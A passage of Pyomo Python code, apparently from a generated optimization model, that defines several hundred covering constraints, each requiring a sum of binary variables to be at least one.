m.c473 = Constraint(expr= m.b296 + m.b299 + m.b305 + m.b318 >= 1)
m.c474 = Constraint(expr= m.b296 + m.b299 + m.b305 + m.b312 >= 1)
m.c475 = Constraint(expr= m.b296 + m.b299 + m.b304 >= 1)
m.c476 = Constraint(expr= m.b296 + m.b299 + m.b302 + m.b317 >= 1)
m.c477 = Constraint(expr= m.b296 + m.b299 + m.b302 + m.b312 + m.b318 >= 1)
m.c478 = Constraint(expr= m.b296 + m.b299 + m.b302 + m.b311 >= 1)
m.c479 = Constraint(expr= m.b296 + m.b299 + m.b302 + m.b306 >= 1)
m.c480 = Constraint(expr= m.b296 + m.b299 + m.b301 >= 1)
m.c481 = Constraint(expr= m.b296 + m.b298 + m.b318 >= 1)
m.c482 = Constraint(expr= m.b296 + m.b298 + m.b312 >= 1)
m.c483 = Constraint(expr= m.b296 + m.b298 + m.b306 >= 1)
m.c484 = Constraint(expr= m.b296 + m.b298 + m.b302 >= 1)
m.c485 = Constraint(expr= m.b296 + m.b297 >= 1)
m.c486 = Constraint(expr= m.b295 + m.b315 >= 1)
m.c487 = Constraint(expr= m.b295 + m.b312 + m.b316 >= 1)
m.c488 = Constraint(expr= m.b295 + m.b311 + m.b317 >= 1)
m.c489 = Constraint(expr= m.b295 + m.b310 + m.b318 >= 1)
m.c490 = Constraint(expr= m.b295 + m.b309 >= 1)
m.c491 = Constraint(expr= m.b295 + m.b306 + m.b317 >= 1)
m.c492 = Constraint(expr= m.b295 + m.b306 + m.b312 + m.b318 >= 1)
m.c493 = Constraint(expr= m.b295 + m.b306 + m.b311 >= 1)
m.c494 = Constraint(expr= m.b295 + m.b305 + m.b318 >= 1)
m.c495 = Constraint(expr= m.b295 + m.b305 + m.b312 >= 1)
m.c496 = Constraint(expr= m.b295 + m.b304 >= 1)
m.c497 = Constraint(expr= m.b295 + m.b302 + m.b318 >= 1)
m.c498 = Constraint(expr= m.b295 + m.b302 + m.b312 >= 1)
m.c499 = Constraint(expr= m.b295 + m.b302 + m.b306 >= 1)
m.c500 = Constraint(expr= m.b295 + m.b301 >= 1)
m.c501 = Constraint(expr= m.b295 + m.b299 + m.b318 >= 1)
m.c502 = Constraint(expr= m.b295 + m.b299 + m.b312 >= 1)
m.c503 = Constraint(expr= m.b295 + m.b299 + m.b306 >= 1)
m.c504 = Constraint(expr= m.b295 + m.b299 + m.b302 >= 1)
m.c505 = Constraint(expr= m.b295 + m.b298 >= 1)
m.c506 = Constraint(expr= m.b294 + m.b318 >= 1)
m.c507 = Constraint(expr= m.b294 + m.b312 >= 1)
m.c508 = Constraint(expr= m.b294 + m.b306 >= 1)
m.c509 = Constraint(expr= m.b294 + m.b302 >= 1)
m.c510 = Constraint(expr= m.b294 + m.b299 >= 1)
m.c511 = Constraint(expr= m.b318 + m.b327 >= 1)
m.c512 = Constraint(expr= m.b318 + m.b325 + m.b328 >= 1)
m.c513 = Constraint(expr= m.b318 + m.b324 + m.b329 >= 1)
m.c514 = Constraint(expr= m.b318 + m.b323 + m.b330 >= 1)
m.c515 = Constraint(expr= m.b318 + m.b322 >= 1)
m.c516 = Constraint(expr= m.b318 + m.b321 + m.b328 >= 1)
m.c517 = Constraint(expr= m.b318 + m.b321 + m.b326 + m.b329 >= 1)
m.c518 = Constraint(expr= m.b318 + m.b321 + m.b324 + m.b331 >= 1)
m.c519 = Constraint(expr= m.b318 + m.b321 + m.b323 >= 1)
m.c520 = Constraint(expr= m.b318 + m.b320 + m.b330 >= 1)
m.c521 = Constraint(expr= m.b318 + m.b320 + m.b326 + m.b331 >= 1)
m.c522 = Constraint(expr= m.b318 + m.b320 + m.b325 >= 1)
m.c523 = Constraint(expr= m.b318 + m.b319 >= 1)
m.c524 = Constraint(expr= m.b317 + m.b327 >= 1)
m.c525 = Constraint(expr= m.b317 + m.b325 + m.b328 >= 1)
m.c526 = Constraint(expr= m.b317 + m.b324 + m.b329 >= 1)
m.c527 = Constraint(expr= m.b317 + m.b323 + m.b330 >= 1)
m.c528 = Constraint(expr= m.b317 + m.b322 >= 1)
m.c529 = Constraint(expr= m.b317 + m.b321 + m.b328 >= 1)
m.c530 = Constraint(expr= m.b317 + m.b321 + m.b326 + m.b329 >= 1)
m.c531 = Constraint(expr= m.b317 + m.b321 + m.b325 + m.b330 >= 1)
m.c532 = Constraint(expr= m.b317 + m.b321 + m.b324 + m.b331 >= 1)
m.c533 = Constraint(expr= m.b317 + m.b321 + m.b323 >= 1)
m.c534 = Constraint(expr= m.b317 + m.b320 + m.b330 >= 1)
m.c535 = Constraint(expr= m.b317 + m.b320 + m.b326 + m.b331 >= 1)
m.c536 = Constraint(expr= m.b317 + m.b320 + m.b325 >= 1)
m.c537 = Constraint(expr= m.b317 + m.b319 >= 1)
m.c538 = Constraint(expr= m.b316 + m.b327 >= 1)
m.c539 = Constraint(expr= m.b316 + m.b326 + m.b328 >= 1)
m.c540 = Constraint(expr= m.b316 + m.b325 + m.b329 >= 1)
m.c541 = Constraint(expr= m.b316 + m.b324 + m.b330 >= 1)
m.c542 = Constraint(expr= m.b316 + m.b323 + m.b331 >= 1)
m.c543 = Constraint(expr= m.b316 + m.b322 >= 1)
m.c544 = Constraint(expr= m.b316 + m.b321 + m.b329 >= 1)
m.c545 = Constraint(expr= m.b316 + m.b321 + m.b326 + m.b330 >= 1)
m.c546 = Constraint(expr= m.b316 + m.b321 + m.b325 + m.b331 >= 1)
m.c547 = Constraint(expr= m.b316 + m.b321 + m.b324 >= 1)
m.c548 = Constraint(expr= m.b316 + m.b320 + m.b331 >= 1)
m.c549 = Constraint(expr= m.b316 + m.b320 + m.b326 >= 1)
m.c550 = Constraint(expr= m.b316 + m.b319 >= 1)
m.c551 = Constraint(expr= m.b315 + m.b328 >= 1)
m.c552 = Constraint(expr= m.b315 + m.b326 + m.b329 >= 1)
m.c553 = Constraint(expr= m.b315 + m.b325 + m.b330 >= 1)
m.c554 = Constraint(expr= m.b315 + m.b324 + m.b331 >= 1)
m.c555 = Constraint(expr= m.b315 + m.b323 >= 1)
m.c556 = Constraint(expr= m.b315 + m.b321 + m.b330 >= 1)
m.c557 = Constraint(expr= m.b315 + m.b321 + m.b326 + m.b331 >= 1)
m.c558 = Constraint(expr= m.b315 + m.b321 + m.b325 >= 1)
m.c559 = Constraint(expr= m.b315 + m.b320 >= 1)
m.c560 = Constraint(expr= m.b314 + m.b329 >= 1)
m.c561 = Constraint(expr= m.b314 + m.b326 + m.b330 >= 1)
m.c562 = Constraint(expr= m.b314 + m.b325 + m.b331 >= 1)
m.c563 = Constraint(expr= m.b314 + m.b324 >= 1)
m.c564 = Constraint(expr= m.b314 + m.b321 + m.b331 >= 1)
m.c565 = Constraint(expr= m.b314 + m.b321 + m.b326 >= 1)
m.c566 = Constraint(expr= m.b314 + m.b320 >= 1)
m.c567 = Constraint(expr= m.b313 + m.b331 >= 1)
m.c568 = Constraint(expr= m.b313 + m.b326 >= 1)
m.c569 = Constraint(expr= m.b313 + m.b321 >= 1)
m.c570 = Constraint(expr= m.b312 + m.b327 >= 1)
m.c571 = Constraint(expr= m.b312 + m.b325 + m.b328 >= 1)
m.c572 = Constraint(expr= m.b312 + m.b324 + m.b329 >= 1)
m.c573 = Constraint(expr= m.b312 + m.b322 >= 1)
m.c574 = Constraint(expr= m.b312 + m.b321 + m.b328 >= 1)
m.c575 = Constraint(expr= m.b312 + m.b321 + m.b326 + m.b329 >= 1)
m.c576 = Constraint(expr= m.b312 + m.b321 + m.b324 + m.b331 >= 1)
m.c577 = Constraint(expr= m.b312 + m.b321 + m.b323 >= 1)
m.c578 = Constraint(expr= m.b312 + m.b320 + m.b330 >= 1)
m.c579 = Constraint(expr= m.b312 + m.b320 + m.b326 + m.b331 >= 1)
m.c580 = Constraint(expr= m.b312 + m.b320 + m.b325 >= 1)
m.c581 = Constraint(expr= m.b312 + m.b319 >= 1)
m.c582 = Constraint(expr= m.b312 + m.b318 + m.b327 >= 1)
m.c583 = Constraint(expr= m.b312 + m.b318 + m.b325 + m.b328 >= 1)
m.c584 = Constraint(expr= m.b312 + m.b318 + m.b324 + m.b329 >= 1)
m.c585 = Constraint(expr= m.b312 + m.b318 + m.b323 + m.b331 >= 1)
m.c586 = Constraint(expr= m.b312 + m.b318 + m.b322 >= 1)
m.c587 = Constraint(expr= m.b312 + m.b318 + m.b321 + m.b328 >= 1)
m.c588 = Constraint(expr= m.b312 + m.b318 + m.b321 + m.b326 + m.b329 >= 1)
m.c589 = Constraint(expr= m.b312 + m.b318 + m.b321 + m.b325 + m.b330 >= 1)
m.c590 = Constraint(expr= m.b312 + m.b318 + m.b321 + m.b324 + m.b331 >= 1)
m.c591 = Constraint(expr= m.b312 + m.b318 + m.b321 + m.b323 >= 1)
m.c592 = Constraint(expr= m.b312 + m.b318 + m.b320 + m.b330 >= 1)
m.c593 = Constraint(expr= m.b312 + m.b318 + m.b320 + m.b326 + m.b331 >= 1)
m.c594 = Constraint(expr= m.b312 + m.b318 + m.b320 + m.b325 >= 1)
m.c595 = Constraint(expr= m.b312 + m.b318 + m.b319 >= 1)
m.c596 = Constraint(expr= m.b312 + m.b317 + m.b327 >= 1)
m.c597 = Constraint(expr= m.b312 + m.b317 + m.b326 + m.b328 >= 1)
m.c598 = Constraint(expr= m.b312 + m.b317 + m.b325 + m.b329 >= 1)
m.c599 = Constraint(expr= m.b312 + m.b317 + m.b324 + m.b330 >= 1)
m.c600 = Constraint(expr= m.b312 + m.b317 + m.b323 + m.b331 >= 1)
m.c601 = Constraint(expr= m.b312 + m.b317 + m.b322 >= 1)
m.c602 = Constraint(expr= m.b312 + m.b317 + m.b321 + m.b329 >= 1)
m.c603 = Constraint(expr= m.b312 + m.b317 + m.b321 + m.b326 + m.b330 >= 1)
m.c604 = Constraint(expr= m.b312 + m.b317 + m.b321 + m.b325 + m.b331 >= 1)
m.c605 = Constraint(expr= m.b312 + m.b317 + m.b321 + m.b324 >= 1)
m.c606 = Constraint(expr= m.b312 + m.b317 + m.b320 + m.b331 >= 1)
m.c607 = Constraint(expr= m.b312 + m.b317 + m.b320 + m.b326 >= 1)
m.c608 = Constraint(expr= m.b312 + m.b317 + m.b319 >= 1)
m.c609 = Constraint(expr= m.b312 + m.b316 + m.b328 >= 1)
m.c610 = Constraint(expr= m.b312 + m.b316 + m.b326 + m.b329 >= 1)
m.c611 = Constraint(expr= m.b312 + m.b316 + m.b325 + m.b330 >= 1)
m.c612 = Constraint(expr= m.b312 + m.b316 + m.b324 + m.b331 >= 1)
m.c613 = Constraint(expr= m.b312 + m.b316 + m.b323 >= 1)
m.c614 = Constraint(expr= m.b312 + m.b316 + m.b321 + m.b330 >= 1)
m.c615 = Constraint(expr= m.b312 + m.b316 + m.b321 + m.b326 + m.b331 >= 1)
m.c616 = Constraint(expr= m.b312 + m.b316 + m.b321 + m.b325 >= 1)
m.c617 = Constraint(expr= m.b312 + m.b316 + m.b320 >= 1)
m.c618 = Constraint(expr= m.b312 + m.b315 + m.b329 >= 1)
m.c619 = Constraint(expr= m.b312 + m.b315 + m.b326 + m.b330 >= 1)
m.c620 = Constraint(expr= m.b312 + m.b315 + m.b325 + m.b331 >= 1)
m.c621 = Constraint(expr= m.b312 + m.b315 + m.b324 >= 1)
m.c622 = Constraint(expr= m.b312 + m.b315 + m.b321 + m.b331 >= 1)
m.c623 = Constraint(expr= m.b312 + m.b315 + m.b321 + m.b326 >= 1)
m.c624 = Constraint(expr= m.b312 + m.b315 + m.b320 >= 1)
m.c625 = Constraint(expr= m.b312 + m.b314 + m.b330 >= 1)
m.c626 = Constraint(expr= m.b312 + m.b314 + m.b326 + m.b331 >= 1)
m.c627 = Constraint(expr= m.b312 + m.b314 + m.b325 >= 1)
m.c628 = Constraint(expr= m.b312 + m.b314 + m.b321 >= 1)
m.c629 = Constraint(expr= m.b311 + m.b327 >= 1)
m.c630 = Constraint(expr= m.b311 + m.b325 + m.b328 >= 1)
m.c631 = Constraint(expr= m.b311 + m.b324 + m.b329 >= 1)
m.c632 = Constraint(expr= m.b311 + m.b323 + m.b330 >= 1)
m.c633 = Constraint(expr= m.b311 + m.b322 >= 1)
m.c634 = Constraint(expr= m.b311 + m.b321 + m.b328 >= 1)
m.c635 = Constraint(expr= m.b311 + m.b321 + m.b326 + m.b329 >= 1)
m.c636 = Constraint(expr= m.b311 + m.b321 + m.b325 + m.b330 >= 1)
m.c637 = Constraint(expr= m.b311 + m.b321 + m.b324 + m.b331 >= 1)
m.c638 = Constraint(expr= m.b311 + m.b321 + m.b323 >= 1)
m.c639 = Constraint(expr= m.b311 + m.b320 + m.b330 >= 1)
m.c640 = Constraint(expr= m.b311 + m.b320 + m.b326 + m.b331 >= 1)
m.c641 = Constraint(expr= m.b311 + m.b320 + m.b325 >= 1)
m.c642 = Constraint(expr= m.b311 + m.b319 >= 1)
m.c643 = Constraint(expr= m.b311 + m.b318 + m.b327 >= 1)
m.c644 = Constraint(expr= m.b311 + m.b318 + m.b326 + m.b328 >= 1)
m.c645 = Constraint(expr= m.b311 + m.b318 + m.b325 + m.b329 >= 1)
m.c646 = Constraint(expr= m.b311 + m.b318 + m.b324 + m.b330 >= 1)
m.c647 = Constraint(expr= m.b311 + m.b318 + m.b323 + m.b331 >= 1)
m.c648 = Constraint(expr= m.b311 + m.b318 + m.b322 >= 1)
m.c649 = Constraint(expr= m.b311 + m.b318 + m.b321 + m.b329 >= 1)
m.c650 = Constraint(expr= m.b311 + m.b318 + m.b321 + m.b326 + m.b330 >= 1)
m.c651 = Constraint(expr= m.b311 + m.b318 + m.b321 + m.b325 + m.b331 >= 1)
m.c652 = Constraint(expr= m.b311 + m.b318 + m.b321 + m.b324 >= 1)
m.c653 = Constraint(expr= m.b311 + m.b318 + m.b320 + m.b331 >= 1)
m.c654 = Constraint(expr= m.b311 + m.b318 + m.b320 + m.b326 >= 1)
m.c655 = Constraint(expr= m.b311 + m.b318 + m.b319 >= 1)
m.c656 = Constraint(expr= m.b311 + m.b317 + m.b328 >= 1)
m.c657 = Constraint(expr= m.b311 + m.b317 + m.b326 + m.b329 >= 1)
m.c658 = Constraint(expr= m.b311 + m.b317 + m.b325 + m.b330 >= 1)
m.c659 = Constraint(expr= m.b311 + m.b317 + m.b324 + m.b331 >= 1)
m.c660 = Constraint(expr= m.b311 + m.b317 + m.b323 >= 1)
m.c661 = Constraint(expr= m.b311 + m.b317 + m.b321 + m.b330 >= 1)
m.c662 = Constraint(expr= m.b311 + m.b317 + m.b321 + m.b326 + m.b331 >= 1)
m.c663 = Constraint(expr= m.b311 + m.b317 + m.b321 + m.b325 >= 1)
m.c664 = Constraint(expr= m.b311 + m.b317 + m.b320 >= 1)
m.c665 = Constraint(expr= m.b311 + m.b316 + m.b329 >= 1)
m.c666 = Constraint(expr= m.b311 + m.b316 + m.b326 + m.b330 >= 1)
m.c667 = Constraint(expr= m.b311 + m.b316 + m.b325 + m.b331 >= 1)
m.c668 = Constraint(expr= m.b311 + m.b316 + m.b324 >= 1)
m.c669 = Constraint(expr= m.b311 + m.b316 + m.b321 + m.b331 >= 1)
m.c670 = Constraint(expr= m.b311 + m.b316 + m.b321 + m.b326 >= 1)
m.c671 = Constraint(expr= m.b311 + m.b316 + m.b320 >= 1)
m.c672 = Constraint(expr= m.b311 + m.b315 + m.b329 >= 1)
m.c673 = Constraint(expr= m.b311 + m.b315 + m.b326 + m.b331 >= 1)
m.c674 = Constraint(expr= m.b311 + m.b315 + m.b325 >= 1)
m.c675 = Constraint(expr= m.b311 + m.b315 + m.b321 >= 1)
m.c676 = Constraint(expr= m.b311 + m.b314 + m.b330 >= 1)
m.c677 = Constraint(expr= m.b311 + m.b314 + m.b326 + m.b331 >= 1)
m.c678 = Constraint(expr= m.b311 + m.b314 + m.b325 >= 1)
m.c679 = Constraint(expr= m.b311 + m.b314 + m.b321 >= 1)
m.c680 = Constraint(expr= m.b310 + m.b327 >= 1)
m.c681 = Constraint(expr= m.b310 + m.b326 + m.b328 >= 1)
m.c682 = Constraint(expr= m.b310 + m.b325 + m.b329 >= 1)
m.c683 = Constraint(expr= m.b310 + m.b324 + m.b330 >= 1)
m.c684 = Constraint(expr= m.b310 + m.b323 + m.b331 >= 1)
m.c685 = Constraint(expr= m.b310 + m.b322 >= 1)
m.c686 = Constraint(expr= m.b310 + m.b321 + m.b329 >= 1)
m.c687 = Constraint(expr= m.b310 + m.b321 + m.b326 + m.b330 >= 1)
m.c688 = Constraint(expr= m.b310 + m.b321 + m.b325 + m.b331 >= 1)
m.c689 = Constraint(expr= m.b310 + m.b321 + m.b324 >= 1)
m.c690 = Constraint(expr= m.b310 + m.b320 + m.b331 >= 1)
m.c691 = Constraint(expr= m.b310 + m.b320 + m.b326 >= 1)
m.c692 = Constraint(expr= m.b310 + m.b319 >= 1)
m.c693 = Constraint(expr= m.b310 + m.b318 + m.b328 >= 1)
m.c694 = Constraint(expr= m.b310 + m.b318 + m.b326 + m.b329 >= 1)
m.c695 = Constraint(expr= m.b310 + m.b318 + m.b325 + m.b330 >= 1)
m.c696 = Constraint(expr= m.b310 + m.b318 + m.b324 + m.b331 >= 1)
m.c697 = Constraint(expr= m.b310 + m.b318 + m.b323 >= 1)
m.c698 = Constraint(expr= m.b310 + m.b318 + m.b321 + m.b330 >= 1)
m.c699 = Constraint(expr= m.b310 + m.b318 + m.b321 + m.b326 + m.b331 >= 1)
m.c700 = Constraint(expr= m.b310 + m.b318 + m.b321 + m.b325 >= 1)
m.c701 = Constraint(expr= m.b310 + m.b318 + m.b320 >= 1)
m.c702 = Constraint(expr= m.b310 + m.b317 + m.b329 >= 1)
m.c703 = Constraint(expr= m.b310 + m.b317 + m.b326 + m.b330 >= 1)
m.c704 = Constraint(expr= m.b310 + m.b317 + m.b325 + m.b331 >= 1)
m.c705 = Constraint(expr= m.b310 + m.b317 + m.b324 >= 1)
m.c706 = Constraint(expr= m.b310 + m.b317 + m.b321 + m.b331 >= 1)
m.c707 = Constraint(expr= m.b310 + m.b317 + m.b321 + m.b326 >= 1)
m.c708 = Constraint(expr= m.b310 + m.b317 + m.b320 >= 1)
m.c709 = Constraint(expr= m.b310 + m.b316 + m.b329 >= 1)
m.c710 = Constraint(expr= m.b310 + m.b316 + m.b326 + m.b330 >= 1)
m.c711 = Constraint(expr= m.b310 + m.b316 + m.b325 + m.b331 >= 1)
m.c712 = Constraint(expr= m.b310 + m.b316 + m.b324 >= 1)
m.c713 = Constraint(expr= m.b310 + m.b316 + m.b321 + m.b331 >= 1)
m.c714 = Constraint(expr= m.b310 + m.b316 + m.b321 + m.b326 >= 1)
m.c715 = Constraint(expr= m.b310 + m.b316 + m.b320 >= 1)
m.c716 = Constraint(expr= m.b310 + m.b315 + m.b330 >= 1)
m.c717 = Constraint(expr= m.b310 + m.b315 + m.b326 + m.b331 >= 1)
m.c718 = Constraint(expr= m.b310 + m.b315 + m.b325 >= 1)
m.c719 = Constraint(expr= m.b310 + m.b315 + m.b321 >= 1)
m.c720 = Constraint(expr= m.b310 + m.b314 + m.b331 >= 1)
m.c721 = Constraint(expr= m.b310 + m.b314 + m.b326 >= 1)
m.c722 = Constraint(expr= m.b310 + m.b314 + m.b321 >= 1)
m.c723 = Constraint(expr= m.b309 + m.b328 >= 1)
m.c724 = Constraint(expr= m.b309 + m.b326 + m.b329 >= 1)
m.c725 = Constraint(expr= m.b309 + m.b325 + m.b330 >= 1)
m.c726 = Constraint(expr= m.b309 + m.b324 + m.b331 >= 1)
m.c727 = Constraint(expr= m.b309 + m.b323 >= 1)
m.c728 = Constraint(expr= m.b309 + m.b321 + m.b330 >= 1)
m.c729 = Constraint(expr= m.b309 + m.b321 + m.b326 + m.b331 >= 1)
m.c730 = Constraint(expr= m.b309 + m.b321 + m.b325 >= 1)
m.c731 = Constraint(expr= m.b309 + m.b320 >= 1)
m.c732 = Constraint(expr= m.b309 + m.b318 + m.b329 >= 1)
m.c733 = Constraint(expr= m.b309 + m.b318 + m.b326 + m.b330 >= 1)
m.c734 = Constraint(expr= m.b309 + m.b318 + m.b325 + m.b331 >= 1)
m.c735 = Constraint(expr= m.b309 + m.b318 + m.b324 >= 1)
m.c736 = Constraint(expr= m.b309 + m.b318 + m.b321 + m.b331 >= 1)
m.c737 = Constraint(expr= m.b309 + m.b318 + m.b321 + m.b326 >= 1)
m.c738 = Constraint(expr= m.b309 + m.b318 + m.b320 >= 1)
m.c739 = Constraint(expr= m.b309 + m.b317 + m.b329 >= 1)
m.c740 = Constraint(expr= m.b309 + m.b317 + m.b326 + m.b330 >= 1)
m.c741 = Constraint(expr= m.b309 + m.b317 + m.b325 >= 1)
m.c742 = Constraint(expr= m.b309 + m.b317 + m.b321 + m.b331 >= 1)
m.c743 = Constraint(expr= m.b309 + m.b317 + m.b321 + m.b326 >= 1)
m.c744 = Constraint(expr= m.b309 + m.b317 + m.b320 >= 1)
m.c745 = Constraint(expr= m.b309 + m.b316 + m.b330 >= 1)
m.c746 = Constraint(expr= m.b309 + m.b316 + m.b326 + m.b331 >= 1)
m.c747 = Constraint(expr= m.b309 + m.b316 + m.b325 >= 1)
m.c748 = Constraint(expr= m.b309 + m.b316 + m.b321 >= 1)
m.c749 = Constraint(expr= m.b309 + m.b315 + m.b331 >= 1)
m.c750 = Constraint(expr= m.b309 + m.b315 + m.b326 >= 1)
m.c751 = Constraint(expr= m.b309 + m.b315 + m.b321 >= 1)
m.c752 = Constraint(expr= m.b308 + m.b329 >= 1)
m.c753 = Constraint(expr= m.b308 + m.b326 + m.b330 >= 1)
m.c754 = Constraint(expr= m.b308 + m.b325 + m.b331 >= 1)
m.c755 = Constraint(expr= m.b308 + m.b324 >= 1)
m.c756 = Constraint(expr= m.b308 + m.b321 + m.b331 >= 1)
m.c757 = Constraint(expr= m.b308 + m.b321 + m.b326 >= 1)
m.c758 = Constraint(expr= m.b308 + m.b320 >= 1)
m.c759 = Constraint(expr= m.b308 + m.b318 + m.b329 >= 1)
m.c760 = Constraint(expr= m.b308 + m.b318 + m.b326 + m.b331 >= 1)
m.c761 = Constraint(expr= m.b308 + m.b318 + m.b325 >= 1)
m.c762 = Constraint(expr= m.b308 + m.b318 + m.b321 >= 1)
m.c763 = Constraint(expr= m.b308 + m.b317 + m.b330 >= 1)
m.c764 = Constraint(expr= m.b308 + m.b317 + m.b326 + m.b331 >= 1)
m.c765 = Constraint(expr= m.b308 + m.b317 + m.b325 >= 1)
m.c766 = Constraint(expr= m.b308 + m.b317 + m.b321 >= 1)
m.c767 = Constraint(expr= m.b308 + m.b316 + m.b331 >= 1)
m.c768 = Constraint(expr= m.b308 + m.b316 + m.b326 >= 1)
m.c769 = Constraint(expr= m.b308 + m.b316 + m.b321 >= 1)
m.c770 = Constraint(expr= m.b307 + m.b331 >= 1)
m.c771 = Constraint(expr= m.b307 + m.b326 >= 1)
m.c772 = Constraint(expr= m.b307 + m.b321 >= 1)
m.c773 = Constraint(expr= m.b306 + m.b327 >= 1)
m.c774 = Constraint(expr= m.b306 + m.b325 + m.b328 >= 1)
m.c775 = Constraint(expr= m.b306 + m.b324 + m.b329 >= 1)
m.c776 = Constraint(expr= m.b306 + m.b323 + m.b330 >= 1)
m.c777 = Constraint(expr= m.b306 + m.b322 >= 1)
m.c778 = Constraint(expr= m.b306 + m.b321 + m.b328 >= 1)
m.c779 = Constraint(expr= m.b306 + m.b321 + m.b326 + m.b329 >= 1)
m.c780 = Constraint(expr= m.b306 + m.b321 + m.b325 + m.b330 >= 1)
m.c781 = Constraint(expr= m.b306 + m.b321 + m.b324 + m.b331 >= 1)
m.c782 = Constraint(expr= m.b306 + m.b321 + m.b323 >= 1)
m.c783 = Constraint(expr= m.b306 + m.b320 + m.b330 >= 1)
m.c784 = Constraint(expr= m.b306 + m.b320 + m.b326 + m.b331 >= 1)
m.c785 = Constraint(expr= m.b306 + m.b320 + m.b325 >= 1)
m.c786 = Constraint(expr= m.b306 + m.b319 >= 1)
m.c787 = Constraint(expr= m.b306 + m.b318 + m.b327 >= 1)
m.c788 = Constraint(expr= m.b306 + m.b318 + m.b326 + m.b328 >= 1)
m.c789 = Constraint(expr= m.b306 + m.b318 + m.b325 + m.b329 >= 1)
m.c790 = Constraint(expr= m.b306 + m.b318 + m.b324 + m.b330 >= 1)
m.c791 = Constraint(expr= m.b306 + m.b318 + m.b323 + m.b331 >= 1)
m.c792 = Constraint(expr= m.b306 + m.b318 + m.b322 >= 1)
m.c793 = Constraint(expr= m.b306 + m.b318 + m.b321 + m.b329 >= 1)
m.c794 = Constraint(expr= m.b306 + m.b318 + m.b321 + m.b326 + m.b330 >= 1)
m.c795 = Constraint(expr= m.b306 + m.b318 + m.b321 + m.b325 + m.b331 >= 1)
m.c796 = Constraint(expr= m.b306 + m.b318 + m.b321 + m.b324 >= 1)
m.c797 = Constraint(expr= m.b306 + m.b318 + m.b320 + m.b331 >= 1)
m.c798 = Constraint(expr= m.b306 + m.b318 + m.b320 + m.b326 >= 1)
m.c799 = Constraint(expr= m.b306 + m.b318 + m.b319 >= 1)
m.c800 = Constraint(expr= m.b306 + m.b317 + m.b328 >= 1)
m.c801 = Constraint(expr= m.b306 + m.b317 + m.b325 + m.b329 >= 1)
m.c802 = Constraint(expr= m.b306 + m.b317 + m.b324 + m.b331 >= 1)
m.c803 = Constraint(expr= m.b306 + m.b317 + m.b323 >= 1)
m.c804 = Constraint(expr= m.b306 + m.b317 + m.b321 + m.b329 >= 1)
m.c805 = Constraint(expr= m.b306 + m.b317 + m.b321 + m.b326 + m.b330 >= 1)
m.c806 = Constraint(expr= m.b306 + m.b317 + m.b321 + m.b325 + m.b331 >= 1)
m.c807 = Constraint(expr= m.b306 + m.b317 + m.b321 + m.b324 >= 1)
m.c808 = Constraint(expr= m.b306 + m.b317 + m.b320 + m.b331 >= 1)
m.c809 = Constraint(expr= m.b306 + m.b317 + m.b320 + m.b326 >= 1)
m.c810 = Constraint(expr= m.b306 + m.b317 + m.b319 >= 1)
m.c811 = Constraint(expr= m.b306 + m.b316 + m.b328 >= 1)
m.c812 = Constraint(expr= m.b306 + m.b316 + m.b326 + m.b329 >= 1)
m.c813 = Constraint(expr= m.b306 + m.b316 + m.b325 + m.b330 >= 1)
m.c814 = Constraint(expr= m.b306 + m.b316 + m.b324 + m.b331 >= 1)
m.c815 = Constraint(expr= m.b306 + m.b316 + m.b323 >= 1)
m.c816 = Constraint(expr= m.b306 + m.b316 + m.b321 + m.b330 >= 1)
m.c817 = Constraint(expr= m.b306 + m.b316 + m.b321 + m.b326 + m.b331 >= 1)
m.c818 = Constraint(expr= m.b306 + m.b316 + m.b321 + m.b325 >= 1)
m.c819 = Constraint(expr= m.b306 + m.b316 + m.b320 >= 1)
m.c820 = Constraint(expr= m.b306 + m.b315 + m.b329 >= 1)
m.c821 = Constraint(expr= m.b306 + m.b315 + m.b326 + m.b330 >= 1)
m.c822 = Constraint(expr= m.b306 + m.b315 + m.b325 + m.b331 >= 1)
m.c823 = Constraint(expr= m.b306 + m.b315 + m.b324 >= 1)
m.c824 = Constraint(expr= m.b306 + m.b315 + m.b321 + m.b331 >= 1)
m.c825 = Constraint(expr= m.b306 + m.b315 + m.b321 + m.b326 >= 1)
m.c826 = Constraint(expr= m.b306 + m.b315 + m.b320 >= 1)
m.c827 = Constraint(expr= m.b306 + m.b314 + m.b330 >= 1)
m.c828 = Constraint(expr= m.b306 + m.b314 + m.b326 + m.b331 >= 1)
m.c829 = Constraint(expr= m.b306 + m.b314 + m.b325 >= 1)
m.c830 = Constraint(expr= m.b306 + m.b314 + m.b321 >= 1)
m.c831 = Constraint(expr= m.b306 + m.b312 + m.b327 >= 1)
m.c832 = Constraint(expr= m.b306 + m.b312 + m.b326 + m.b328 >= 1)
m.c833 = Constraint(expr= m.b306 + m.b312 + m.b325 + m.b329 >= 1)
m.c834 = Constraint(expr= m.b306 + m.b312 + m.b324 + m.b330 >= 1)
m.c835 = Constraint(expr= m.b306 + m.b312 + m.b323 + m.b331 >= 1)
m.c836 = Constraint(expr= m.b306 + m.b312 + m.b322 >= 1)
m.c837 = Constraint(expr= m.b306 + m.b312 + m.b321 + m.b329 >= 1)
m.c838 = Constraint(expr= m.b306 + m.b312 + m.b321 + m.b326 + m.b330 >= 1)
m.c839 = Constraint(expr= m.b306 + m.b312 + m.b321 + m.b325 + m.b331 >= 1)
m.c840 = Constraint(expr= m.b306 + m.b312 + m.b321 + m.b324 >= 1)
m.c841 = Constraint(expr= m.b306 + m.b312 + m.b320 + m.b331 >= 1)
m.c842 = Constraint(expr= m.b306 + m.b312 + m.b320 + m.b326 >= 1)
m.c843 = Constraint(expr= m.b306 + m.b312 + m.b319 >= 1)
m.c844 = Constraint(expr= m.b306 + m.b312 + m.b318 + m.b328 >= 1)
m.c845 = Constraint(expr= m.b306 + m.b312 + m.b318 + m.b326 + m.b329 >= 1)
m.c846 = Constraint(expr= m.b306 + m.b312 + m.b318 + m.b325 + m.b330 >= 1)
m.c847 = Constraint(expr= m.b306 + m.b312 + m.b318 + m.b324 + m.b331 >= 1)
m.c848 = Constraint(expr= m.b306 + m.b312 + m.b318 + m.b323 >= 1)
m.c849 = Constraint(expr= m.b306 + m.b312 + m.b318 + m.b321 + m.b330 >= 1)
m.c850 = Constraint(expr= m.b306 + m.b312 + m.b318 + m.b321 + m.b326 + m.b331 >= 1)
m.c851 = Constraint(expr= m.b306 + m.b312 + m.b318 + m.b321 + m.b325 >= 1)
m.c852 = Constraint(expr= m.b306 + m.b312 + m.b318 + m.b320 >= 1)
m.c853 = Constraint(expr= m.b306 + m.b312 + m.b317 + m.b328 >= 1)
m.c854 = Constraint(expr= m.b306 + m.b312 + m.b317 + m.b326 + m.b329 >= 1)
